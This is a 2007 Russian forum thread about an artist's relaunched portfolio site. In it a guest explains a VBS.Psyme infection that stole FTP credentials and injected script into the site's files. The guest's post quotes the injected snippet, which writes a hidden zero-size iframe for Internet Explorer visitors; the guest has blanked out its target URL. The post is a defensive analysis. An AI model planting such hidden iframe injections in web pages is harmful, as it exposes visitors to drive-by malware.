Мой профсайт или "ура, заработало!!!"(с) |
Здравствуйте, гость ( Вход | Регистрация )
Мой профсайт или "ура, заработало!!!"(с) |
18.1.2007, 13:39
Сообщение
#1
|
|
Недомайа Группа: Админы Сообщений: 5780 Регистрация: 14.5.2004 Из: Ангамалле Пользователь №: 4 |
Вот, свершается!
Мой профессиональный сайт оживает стараниями Гэллорна. После того, как прошлая версия по неясным причинам канула в непонятно куда, Гэллорн разработал новый дизайн, ну и... А экспонатов там теперь будет в полтора раза больше, добавилась керамика (уже висит) и еще всякое Короче, вот: http://ira-art.net/index.html Я рад |
|
|
18.4.2007, 23:08
Сообщение
#2
|
|
Свиназгул Группа: Админы Сообщений: 896 Регистрация: 27.4.2004 Из: Рамот Пользователь №: 1 |
Пароль сменить разумеется можно. А выяснять ничего не надо. Аплоад сделал я. Просто увидел что сайт отстствует, ну и залил тот бэкап, который у меня был. Прошу прощения, я поторопился, сначала надо было у вас спросить. А чего там заражено то было? Я сайт посмотрел и ничего такого не увидел.
-------------------- Свински просто!
|
|
|
Мимохожий__* |
19.4.2007, 9:27
Сообщение
#3
|
Гости |
Пароль сменить разумеется можно. А выяснять ничего не надо. Аплоад сделал я. Просто увидел что сайт отстствует, ну и залил тот бэкап, который у меня был. Прошу прощения, я поторопился, сначала надо было у вас спросить. А чего там заражено то было? Я сайт посмотрел и ничего такого не увидел. Вирус: DrWeb опознал как VBS.Psyme (точнее не помню, но скорее всего 206 какой-нибудь) Распространение: при открытии страницы посредством IE сохраняется в Temporary Internet Files; определяет доступные ftp аккаунты - из far, total commander и прочих файл-манагеров. Cоответственно, втихую копирует продукты своей жизнедеятельности туда, заражая .php и .html файлы. Собственно, он дописывает в конец файла вот это вот: <!--start_frame0xf--//> <script type="text/javascript">if (navigator.userAgent.indexOf('MSIE') != -1) { document.writeln('<iframe src="##########/index.php" frameborder=0 border=0 width=0 height=0 style="position: absolute; visibility: hidden"></iframe>'); }</script> <!--end_frame0xf--//> где тема с "#########/index.php" - (я намеренно прибил ссылку) видимо, система распространения вируса и есть. Отслеживание: DRWeb начиная с версии 4.33 (с нормальной лицензионной базой) - точно. Дополнение: он обходит рекурсивно все доступные каталоги. Так что "обсижен" им не только сам сайт, но и все "системные" фолдеры, где попадались файлы с указанным расширением. В первый раз я сливал на локал все и на локале же чистил - ну, дома проще, дома Sabayon стоит. Помогло. Сейчас, видимо, нужно будет либо скрипт писать либо так же, как и в первый раз, поступать. |
|
|
Текстовая версия | Сейчас: 10.1.2025, 11:08 |